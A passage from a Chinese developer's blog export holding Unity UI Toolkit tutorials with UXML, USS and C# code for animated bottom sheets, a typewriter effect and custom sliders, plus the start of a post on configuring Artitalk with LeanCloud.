    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" style="flex-grow: 1; background-color: rgba(0, 0, 0, 0.75);" />
    <ui:VisualElement style="bottom: 0; height: 50%; width: 100%; position: absolute; border-top-left-radius: 40px; border-bottom-left-radius: 0; border-top-right-radius: 40px; border-bottom-right-radius: 0; background-color: rgb(255, 255, 255); align-items: center; padding-left: 50px; padding-right: 50px; padding-top: 50px; padding-bottom: 50px;">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement style="background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&amp;guid=c9c505e591b63904a901936e91e0ae2a&amp;type=3#Hyperspace - Projector&apos;); width: 438px; height: 400px;" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" class="textparagraph" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    .text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
    }

    .textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
    }

JavaScript has jQuery; Unity has UQuery!
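Before the full controller below, a quick UQuery sketch of my own (the element name and class come from the UXML above): Q<T> returns the first match, while Query<T> builds a selection over many elements, much like jQuery's $():

using UnityEngine;
using UnityEngine.UIElements;

public class UQueryDemo : MonoBehaviour
{
    void Start()
    {
        var root = GetComponent<UIDocument>().rootVisualElement;

        // First Button named "Button_Open":
        Button open = root.Q<Button>("Button_Open");

        // Every Button carrying the USS class "button-blue":
        root.Query<Button>(className: "button-blue")
            .ForEach(b => b.text = "queried!");
    }
}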

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class UIController : MonoBehaviour
    {
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    // Start is called before the first frame update
    void Start()
    {
    var root = GetComponent<UIDocument>().rootVisualElement;
    _bottomContainer = root.Q<VisualElement>("Container_Bottom");
    _openButton = root.Q<Button>("Button_Open");
    _closeButton = root.Q<Button>("Button_Close");

    _bottomSheet = root.Q<VisualElement>("BottomSheet");
    _scrim = root.Q<VisualElement>("Scrim");

    _bottomContainer.style.display = DisplayStyle.None;

    _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
    _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.Flex;

    _bottomSheet.AddToClassList("bottomsheet--up");
    _scrim.AddToClassList("scrim--fadein");
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.None;

    _bottomSheet.RemoveFromClassList("bottomsheet--up");
    _scrim.RemoveFromClassList("scrim--fadein");
    }

    // Update is called once per frame
    void Update()
    {

    }
    }


Bind UIController.cs on the UIDocument and hit Play! This leaves one problem: no animation plays when the menu closes, because display is switched to None immediately and cuts the transition short.

    Unity UI Toolkit Beginner’s Guide 3: Scripting Animation

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" class="image--boy image--boy--inair" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" class="scrim" />
    <ui:VisualElement name="BottomSheet" class="bottomsheet">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement name="image_Girl" class="image--girl image--girl--up" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" name="Message" class="textparagraph" style="margin-top: 80px;" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    .text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
    }

    .textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
    }

    .bottomsheet {
    width: 100%;
    height: 50%;
    position: relative;
    background-color: rgba(255, 255, 255, 255);
    align-items: center;
    padding-left: 40px;
    padding-right: 40px;
    padding-top: 40px;
    padding-bottom: 40px;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-bounce;
    translate: 0 100%;
    }

    .bottomsheet--up {
    translate: 0 0;
    }

    .scrim {
    height: 50%;
    background-color: rgba(0, 0, 0, 0.5);
    transition-property: opacity;
    transition-duration: 0.5s;
    opacity: 0;
    }

    .scrim--fadein {
    opacity: 1;
    }

    .image--boy {
    background-color: rgba(255, 255, 255, 0);
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&guid=6a43c56327b2ded46a942d159deac62a&type=3#Hyperspace - Floating');
    height: 600px;
    width: 300px;
    transition-property: translate;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-out-sine;
    translate: 0 0;
    }

    .image--boy--inair {
    translate: -500px -400px;
    }

    .image--girl {
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&guid=c9c505e591b63904a901936e91e0ae2a&type=3#Hyperspace - Projector');
    width: 438px;
    height: 400px;
    translate: 0 60px;
    transition-property: translate;
    transition-timing-function: ease-out-sine;
    transition-duration: 0.5s;
    }

    .image--girl--up {
    translate: 0 0;
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;
    using DG.Tweening;

    public class UIController : MonoBehaviour
    {
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    private VisualElement _boy;
    private VisualElement _girl;
    private Label _message;
    // Start is called before the first frame update
    void Start()
    {
    var root = GetComponent<UIDocument>().rootVisualElement;
    _bottomContainer = root.Q<VisualElement>("Container_Bottom");
    _openButton = root.Q<Button>("Button_Open");
    _closeButton = root.Q<Button>("Button_Close");

    _bottomSheet = root.Q<VisualElement>("BottomSheet");
    _scrim = root.Q<VisualElement>("Scrim");

    _boy = root.Q<VisualElement>("image_Boy");
    _girl = root.Q<VisualElement>("image_Girl");

    _message = root.Q<Label>("Message");

    _bottomContainer.style.display = DisplayStyle.None;

    _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
    _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);

    Invoke("AnimateBoy", 1f);

    _bottomSheet.RegisterCallback<TransitionEndEvent>(OnBottomSheetDown);
    }

    private void AnimateBoy()
    {
    _boy.RemoveFromClassList("image--boy--inair");
    }

    private void AnimateGirl()
    {
    _girl.ToggleInClassList("image--girl--up");
    _girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
    );

    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.Flex;

    _bottomSheet.AddToClassList("bottomsheet--up");
    _scrim.AddToClassList("scrim--fadein");

    AnimateGirl();
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
    _bottomSheet.RemoveFromClassList("bottomsheet--up");
    _scrim.RemoveFromClassList("scrim--fadein");
    }

    private void OnBottomSheetDown(TransitionEndEvent evt)
    {
    if (!_bottomSheet.ClassListContains("bottomsheet--up"))
    {
    _bottomContainer.style.display = DisplayStyle.None;
    }
    }

    // Update is called once per frame
    void Update()
    {
    }
    }

The key pieces:

    Invoke("AnimateBoy", 1f);

Delaying the call to AnimateBoy so the entry animation plays correctly after layout is ready.
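As an aside, the same one-second delay could be scheduled on the element itself instead of through MonoBehaviour.Invoke; a sketch that would sit inside Start, where root is in scope:

root.schedule.Execute(AnimateBoy).StartingIn(1000); // delay in milliseconds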

    _girl.ToggleInClassList("image--girl--up");
    _girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
    );

Re-toggling the class on every TransitionEndEvent produces a looping animation.

    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);

A typewriter effect implemented with the DOTween plugin.

    Unity UI Toolkit Beginner’s Guide 4: Customizing Slider 1


Get hold of a texture for the slider.


Create a Slider, set its Background to the slider Sprite, and open the Sprite Editor to adjust the texture's Border (its 9-slice margins).


The slider's built-in children can't be edited directly; their styles can only be overridden with USS selectors.

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;" />
    </ui:UXML>
    #MySlider Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    background-color: rgb(222, 255, 184);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgba(0, 140, 255, 255);
    }

The align-self: flex-end under .bar doesn't exist yet in my version of Unity; hilariously, editing the USS file by hand still works.

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> evt)
    {
    Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

At the end, the author says the same thing would have taken him at most five minutes in UGUI. Lol, not exactly convenient.

    Unity UI Toolkit Beginner’s Guide 5: Customizing Slider 2

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; translate: 0 200px;" />
    <ui:VisualElement class="bubble" style="display: none; left: 0;">
    <ui:Label text="24" display-tooltip-when-elided="true" class="bubble_label" style="display: flex;" />
    </ui:VisualElement>
    </ui:UXML>
    #MySlider > Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    border-top-left-radius: 10px;
    border-bottom-left-radius: 10px;
    border-top-right-radius: 10px;
    border-bottom-right-radius: 10px;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgb(0, 140, 255);
    }

    .bubble {
    position: absolute;
    background-image: url('project://database/Assets/Images/Bubble.png?fileID=2800000&guid=b836b02351db7664d82b839e800143df&type=3#Bubble');
    width: 110px;
    height: 140px;
    opacity: 1;
    transition-property: scale, opacity;
    transition-duration: 1s, 1s;
    transition-timing-function: ease-out-elastic, ease-out-elastic;
    transform-origin: bottom;
    }

    .bubble_label {
    width: 100%;
    height: 75%;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -unity-text-align: middle-center;
    font-size: 40px;
    -unity-font-style: bold;
    color: rgb(255, 255, 255);
    display: flex;
    }

    .bubble--hidden {
    opacity: 0;
    scale: 0.5 0.5;
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    private VisualElement m_Bubble;
    private Label m_BubbleLabel;

    public Color color_A;
    public Color color_B;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);

    m_Slider.RegisterCallback<PointerCaptureEvent>(_=>
    {
    m_Bubble.RemoveFromClassList("bubble--hidden");
    });

    m_Slider.RegisterCallback<PointerCaptureOutEvent>(_ =>
    {
    m_Bubble.AddToClassList("bubble--hidden");
    });
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;

    m_Bubble = new VisualElement();
    m_Slider.Add(m_Bubble);
    m_Bubble.name = "Bubble";
    m_Bubble.AddToClassList("bubble");
    m_Bubble.AddToClassList("bubble--hidden");
    m_Bubble.pickingMode = PickingMode.Ignore;

    m_BubbleLabel = new Label();
    m_Bubble.Add(m_BubbleLabel);
    m_BubbleLabel.name = "Bubble_Label";
    m_BubbleLabel.AddToClassList("bubble_label");
    m_BubbleLabel.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> value)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;

    float v = Mathf.Round(value.newValue);

    m_BubbleLabel.text = v.ToString();

    m_Bar.style.backgroundColor = Color.Lerp(color_A, color_B, v / 100f);
    m_Bubble.style.unityBackgroundImageTintColor = Color.Lerp(color_A, color_B, v / 100f);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    Unity UI Toolkit Beginner’s Guide 6: Timeline Animation

A plugin that adds Timeline support to UI Toolkit.

    ]]>
    @@ -2658,7 +2658,7 @@ /posts/Hexo-Artitalk/ - 配置

Configuration basically follows the steps in 使用文档 | Artitalk.js (I didn't set an avatar for the status posts). One caveat: the docs recommend the international edition of LeanCloud, which is blocked in mainland China, so that's a no-go! Use the China edition of LeanCloud instead.

Load Artitalk's JS locally from ArtitalkJS/Artitalk: 通过 leancloud 实现的可实时发布说说的 js (github.com); this makes it easier to tweak and avoids the blocking.

Usage: drop in the following HTML (I adjusted the CSS here to hide some blocked content, and reference the locally loaded Artitalk.js):

    <style>
    #artitalk_main ul#maina>li {
    margin: 0;
    }
    .delete_right>svg {
    transform: translateX(-8px);
    }
    #shuoshuo-modal>center, #userinfo>center, #chanshu>center, #shanchur>center {
    margin: 10px 0;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel {
    margin: 0 0 20px 90px;
    }
    #artitalk_main .cbp_tmtimeline>li:before, #uploadSource, #loadEmoji {
    display: none !important;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel>div>p, span.cbp_tmlabel>p, .shuoshuo_time {
    color: white;
    }
